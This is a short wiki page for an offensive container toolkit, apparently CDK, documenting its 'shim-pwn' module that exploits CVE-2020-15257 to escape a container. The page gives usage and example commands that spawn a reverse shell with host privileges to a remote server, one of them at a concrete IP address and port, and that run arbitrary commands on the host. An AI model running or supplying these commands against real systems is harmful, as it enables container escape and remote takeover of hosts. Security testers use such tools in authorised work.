Exploit: shim pwn
cdxy edited this page Mar 5, 2021
·
3 revisions
Pages 49
Clone this wiki locally
自动化逃逸CVE-2020-15257,反弹宿主机的shell到远端服务器。
Automatic exploit CVE-2020-15257, spawn a reverse shell with host privilege to remote server.
Usage
reverse shell
./cdk run shim-pwn reverse <RHOST> <RPORT>
execute command
./cdk run shim-pwn "<shell_cmd>"
Example
reverse shell
./cdk run shim-pwn reverse 47.104.151.168 111
execute command
./cdk run shim-pwn "touch /tmp/exploit_success"